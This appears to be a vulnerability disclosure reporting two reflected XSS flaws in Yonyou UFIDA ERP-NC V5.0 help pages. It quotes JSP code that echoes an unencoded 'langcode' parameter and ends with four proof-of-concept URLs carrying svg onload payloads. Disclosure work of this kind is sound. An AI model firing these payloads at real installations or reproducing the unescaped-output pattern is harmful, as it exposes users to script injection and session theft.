-
Notifications
You must be signed in to change notification settings - Fork 0
Description
Summary
This report details the discovery of two Reflected Cross-Site Scripting (XSS) vulnerabilities in Yonyou UFIDA ERP-NC V5.0. These vulnerabilities exist in the /help/systop.jsp and /help/top.jsp components of the application. The vulnerabilities allow an attacker to inject malicious JavaScript code into the application, which is then executed in the context of the victim's browser.
Details
/help/systop.jsp
<%String sLangcode = request.getParameter("langcode");%>
···
<SCRIPT language=JavaScript type=text/JavaScript>
function onclickSearch(){
var term = document.frm1.term.value;
if (term!="")
window.parent.frames['helpfr2'].window.location.href = "Search.jsp?langcode=<%=sLangcode%>&term=" + term;
}
</SCRIPT>
···
<DIV style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=image/logo_<%=sLangcode%>.png);width:208px;height:47px">
The langcode parameter in /help/systop.jsp is directly used in the HTML output without proper sanitization or encoding. This allows an attacker to inject arbitrary JavaScript code, which is executed when the page is rendered.
/help/top.jsp
<%String sLangcode = request.getParameter("langcode");%>
···
<TD width="50" align=right> <font size="2"><%=nc.bs.ml.NCLangResOnserver.getInstance().getString(sLangcode,"smcomm","","search_find")%></font>
···
<TD width="80" align=right><font size="2"><%=nc.bs.ml.NCLangResOnserver.getInstance().getString(sLangcode,"smcomm","","displaydir")%></font></TD>
···
<a href="/menu.jsp?datasource=<%=sDatasource%>&langcode=<%=sLangcode%>" target="helpfr2">
···
<DIV style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=image/logo_<%=sLangcode%>.png);width:208px;height:47px">
Similar to the first vulnerability, the langcode parameter in /help/top.jsp is also directly used in the HTML output without proper sanitization or encoding. This allows an attacker to inject arbitrary JavaScript code, which is executed when the page is rendered.
POC
http://target-ip/help/top.jsp?langcode=1%22%3E%3Csvg%20onload=alert(1)%3E
http://target-ip/help/top.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(1)%3E
http://target-ip/help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(1)%3E
http://target-ip/help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(1)%3E